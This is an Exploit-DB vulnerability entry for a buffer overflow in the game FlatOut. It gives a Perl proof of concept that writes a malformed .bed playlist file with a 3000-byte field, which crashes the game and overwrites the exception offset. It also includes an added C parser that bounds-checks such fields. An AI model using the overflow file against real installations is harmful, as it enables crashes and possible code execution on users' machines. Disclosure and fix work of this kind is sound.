Bugbear FlatOut 2005 Malformed .bed file Buffer Overflow Vulnerability

EDB-ID: 18173 CVE: 2011-5173 OSVDB-ID: 83328
Verified: Author: Silent_Dream Published: 2011-11-30
# Exploit Title: FlatOut Malformed .bed file Buffer Overflow
# Date: 11-29-11
# Author: Silent Dream
# Software Link: http://www.gog.com/en/gamecard/flatout
# Version: Latest
# Tested on: Windows 7

# Tested on GOG.com copy of FlatOut. Exception offset = 61616161
# Multiple .bed files are vulnerable to buffer overflows... too many to even begin to list.

use strict;
use warnings;

my $file = "playlist_0.bed";
my $head = "Title\t=\t\"";          # start of the Title field
my $junk = "a" x 3000 . "\"\r";     # 3000-byte Title value, then the closing quote
my $tail = "Loop\t= {" . "\r}";
open(my $fh, '>', $file) or die "Cannot open $file: $!";
print $fh $head.$junk.$tail;
close($fh);
print "Overwrite the original playlist_0.bed file in %program files%\\GOG.com\\FlatOut\\data\\music and launch flatout.exe...wait for the crash\r\n";
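
The fix side of the crash above, as an added example that is not part of the original exploit or of the game's code: a bounded reader for a `Key = "value"` line in a .bed file that checks the value's length against the destination buffer before copying. The function name, result codes and the 256-byte `TITLE_MAX` are assumptions made for illustration; the page does not show the game's parser or its real buffer size.

```c
#include <stddef.h>
#include <string.h>

#define TITLE_MAX 256  /* assumed capacity; the game's real buffer size is not on the page */

/* Result codes for parse_bed_string() (hypothetical names). */
enum { BED_OK = 0, BED_NO_KEY = -1, BED_MALFORMED = -2, BED_TOO_LONG = -3 };

/*
 * Copy the quoted value of a `Key = "value"` line into out (capacity out_sz).
 * The length is measured against out_sz before any byte is copied, so an
 * overlong value is rejected instead of running past the end of the buffer.
 */
int parse_bed_string(const char *line, const char *key, char *out, size_t out_sz)
{
    size_t klen = strlen(key);
    const char *p, *end;
    size_t len;

    if (out_sz == 0) return BED_MALFORMED;
    out[0] = '\0';
    if (strncmp(line, key, klen) != 0) return BED_NO_KEY;

    p = line + klen;
    p += strspn(p, " \t");              /* whitespace before '=' */
    if (*p != '=') return BED_MALFORMED;
    p++;
    p += strspn(p, " \t");              /* whitespace after '=' */
    if (*p != '"') return BED_MALFORMED;
    p++;

    end = strchr(p, '"');               /* a closing quote must exist */
    if (end == NULL) return BED_MALFORMED;

    len = (size_t)(end - p);
    if (len >= out_sz) return BED_TOO_LONG;  /* leave room for the NUL */

    memcpy(out, p, len);
    out[len] = '\0';
    return BED_OK;
}
```

A line shaped like the one the script writes (a 3000-byte Title value) returns `BED_TOO_LONG` and leaves the output buffer empty.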